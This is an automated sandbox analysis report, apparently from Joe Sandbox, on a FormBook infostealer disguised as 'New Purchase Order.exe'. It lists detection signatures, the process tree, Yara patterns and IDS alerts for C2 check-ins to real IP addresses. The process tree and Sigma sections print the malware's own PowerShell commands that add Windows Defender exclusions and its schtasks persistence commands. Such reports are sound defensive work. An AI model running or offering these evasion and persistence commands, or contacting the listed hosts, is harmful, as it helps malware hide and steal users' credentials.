Windows Analysis Report
New Purchase Order.exe

Overview

General Information

Sample name: New Purchase Order.exe
Analysis ID: 1507701
MD5: 9ef9cffb40d3911e46cb798daa08b46f
SHA1: 69bbbc4b8a61ff2fb340f6921c9d66e5f3337cfa
SHA256: a1c124aa85ef07d4c39706dcd012d208576a4b08ec24106fd28d4c5847f9afc9
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • New Purchase Order.exe (PID: 6608 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: 9EF9CFFB40D3911E46CB798DAA08B46F)
    • powershell.exe (PID: 2992 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ibDqDkseW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7352 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7132 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • New Purchase Order.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: 9EF9CFFB40D3911E46CB798DAA08B46F)
      • kdFPsEWDpy.exe (PID: 6044 cmdline: "C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • setupugc.exe (PID: 7752 cmdline: "C:\Windows\SysWOW64\setupugc.exe" MD5: 342CBB77B3F4B3F073DF2F042D20E121)
          • kdFPsEWDpy.exe (PID: 2132 cmdline: "C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7972 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • ibDqDkseW.exe (PID: 7340 cmdline: C:\Users\user\AppData\Roaming\ibDqDkseW.exe MD5: 9EF9CFFB40D3911E46CB798DAA08B46F)
    • schtasks.exe (PID: 7532 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ibDqDkseW.exe (PID: 7576 cmdline: "C:\Users\user\AppData\Roaming\ibDqDkseW.exe" MD5: 9EF9CFFB40D3911E46CB798DAA08B46F)
    • ibDqDkseW.exe (PID: 7584 cmdline: "C:\Users\user\AppData\Roaming\ibDqDkseW.exe" MD5: 9EF9CFFB40D3911E46CB798DAA08B46F)
  • cleanup
No configs have been found
Source / Rule / Description / Author / Strings
Source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x2f2a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17412:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x34f2a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1d099:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source / Rule / Description / Author / Strings
Source: 8.2.New Purchase Order.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 8.2.New Purchase Order.exe.400000.0.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x2e4a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16612:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x2f2a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17412:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 6608, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", ProcessId: 2992, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ibDqDkseW.exe, ParentImage: C:\Users\user\AppData\Roaming\ibDqDkseW.exe, ParentProcessId: 7340, ParentProcessName: ibDqDkseW.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp", ProcessId: 7532, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 6608, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp", ProcessId: 7132, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 6608, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe", ProcessId: 2992, ProcessName: powershell.exe

            Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\New Purchase Order.exe", ParentImage: C:\Users\user\Desktop\New Purchase Order.exe, ParentProcessId: 6608, ParentProcessName: New Purchase Order.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp", ProcessId: 7132, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-09T04:51:33.457358+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 82.221.128.183 | 80 | TCP
2024-09-09T04:52:04.971654+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 217.160.0.127 | 80 | TCP
2024-09-09T04:52:18.546634+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 85.159.66.93 | 80 | TCP
2024-09-09T04:52:32.580881+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49754 | 54.179.173.60 | 80 | TCP
2024-09-09T04:52:46.258157+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49758 | 162.0.213.94 | 80 | TCP
2024-09-09T04:52:59.535259+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49762 | 3.33.130.190 | 80 | TCP
2024-09-09T04:53:12.697406+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49766 | 13.248.169.48 | 80 | TCP
2024-09-09T04:53:26.012494+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49770 | 185.134.245.113 | 80 | TCP
2024-09-09T04:53:39.898339+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49774 | 103.42.108.46 | 80 | TCP
2024-09-09T04:54:02.019450+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49778 | 38.55.112.70 | 80 | TCP
2024-09-09T04:54:23.800670+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49782 | 162.240.81.18 | 80 | TCP
2024-09-09T04:54:57.868388+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49786 | 54.183.209.210 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-09T04:51:57.333525+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 217.160.0.127 | 80 | TCP
2024-09-09T04:51:59.892864+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 217.160.0.127 | 80 | TCP
2024-09-09T04:52:02.552406+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 217.160.0.127 | 80 | TCP
2024-09-09T04:52:10.809816+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 85.159.66.93 | 80 | TCP
2024-09-09T04:52:13.357463+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 85.159.66.93 | 80 | TCP
2024-09-09T04:52:15.900214+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 85.159.66.93 | 80 | TCP
2024-09-09T04:52:24.881361+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 54.179.173.60 | 80 | TCP
2024-09-09T04:52:27.486647+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49752 | 54.179.173.60 | 80 | TCP
2024-09-09T04:52:30.067218+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 54.179.173.60 | 80 | TCP
2024-09-09T04:52:38.628754+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49755 | 162.0.213.94 | 80 | TCP
2024-09-09T04:52:41.191892+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 162.0.213.94 | 80 | TCP
2024-09-09T04:52:43.748193+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 162.0.213.94 | 80 | TCP
2024-09-09T04:52:51.874986+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 3.33.130.190 | 80 | TCP
2024-09-09T04:52:54.426237+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49760 | 3.33.130.190 | 80 | TCP
2024-09-09T04:52:56.973656+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49761 | 3.33.130.190 | 80 | TCP
2024-09-09T04:53:05.038781+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 13.248.169.48 | 80 | TCP
2024-09-09T04:53:07.589600+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49764 | 13.248.169.48 | 80 | TCP
2024-09-09T04:53:10.141285+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 13.248.169.48 | 80 | TCP
2024-09-09T04:53:18.391239+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49767 | 185.134.245.113 | 80 | TCP
2024-09-09T04:53:20.935573+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49768 | 185.134.245.113 | 80 | TCP
2024-09-09T04:53:23.485548+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49769 | 185.134.245.113 | 80 | TCP
2024-09-09T04:53:32.245544+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49771 | 103.42.108.46 | 80 | TCP
2024-09-09T04:53:34.811568+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49772 | 103.42.108.46 | 80 | TCP
2024-09-09T04:53:37.364123+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49773 | 103.42.108.46 | 80 | TCP
2024-09-09T04:53:54.399966+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49775 | 38.55.112.70 | 80 | TCP
2024-09-09T04:53:56.942945+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49776 | 38.55.112.70 | 80 | TCP
2024-09-09T04:53:59.488015+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49777 | 38.55.112.70 | 80 | TCP
2024-09-09T04:54:16.181262+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49779 | 162.240.81.18 | 80 | TCP
2024-09-09T04:54:18.700631+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49780 | 162.240.81.18 | 80 | TCP
2024-09-09T04:54:21.251151+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49781 | 162.240.81.18 | 80 | TCP
2024-09-09T04:54:30.364349+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49783 | 54.183.209.210 | 80 | TCP
2024-09-09T04:54:32.915872+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49784 | 54.183.209.210 | 80 | TCP
2024-09-09T04:54:35.459872+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49785 | 54.183.209.210 | 80 | TCP


            AV Detection

Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe, ReversingLabs: Detection: 21%
Source: New Purchase Order.exe, Virustotal: Detection: 30%
Source: Yara match, File source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe, Joe Sandbox ML: detected
Source: New Purchase Order.exe, Joe Sandbox ML: detected
Source: New Purchase Order.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: New Purchase Order.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: setupugc.pdb source: New Purchase Order.exe, 00000008.00000002.1910720585.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000002.4111164419.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kdFPsEWDpy.exe, 00000010.00000002.4110547247.000000000095E000.00000002.00000001.01000000.0000000D.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4110594599.000000000095E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1910699231.0000000003553000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1912560633.000000000370D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, setupugc.exe, 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1910699231.0000000003553000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1912560633.000000000370D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: setupugc.pdbGCTL source: New Purchase Order.exe, 00000008.00000002.1910720585.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000002.4111164419.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\setupugc.exe, Code function: 17_2_02E6C520 FindFirstFileW,FindNextFileW,FindClose (17_2_02E6C520)
Source: C:\Windows\SysWOW64\setupugc.exe, Code function: 4x nop then xor eax, eax (17_2_02E59C00)
Source: C:\Windows\SysWOW64\setupugc.exe, Code function: 4x nop then mov ebx, 00000004h (17_2_03750469)

            Networking

Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49779 -> 162.240.81.18:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49774 -> 103.42.108.46:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 103.42.108.46:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 162.0.213.94:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 162.0.213.94:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 54.179.173.60:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49786 -> 54.183.209.210:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49746 -> 217.160.0.127:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49757 -> 162.0.213.94:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49750 -> 85.159.66.93:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49758 -> 162.0.213.94:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49778 -> 38.55.112.70:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49784 -> 54.183.209.210:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 85.159.66.93:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49762 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 185.134.245.113:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49780 -> 162.240.81.18:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 217.160.0.127:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49753 -> 54.179.173.60:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49783 -> 54.183.209.210:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 217.160.0.127:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 54.179.173.60:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49770 -> 185.134.245.113:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49761 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49776 -> 38.55.112.70:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49769 -> 185.134.245.113:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49749 -> 85.159.66.93:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49766 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49777 -> 38.55.112.70:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49765 -> 13.248.169.48:80
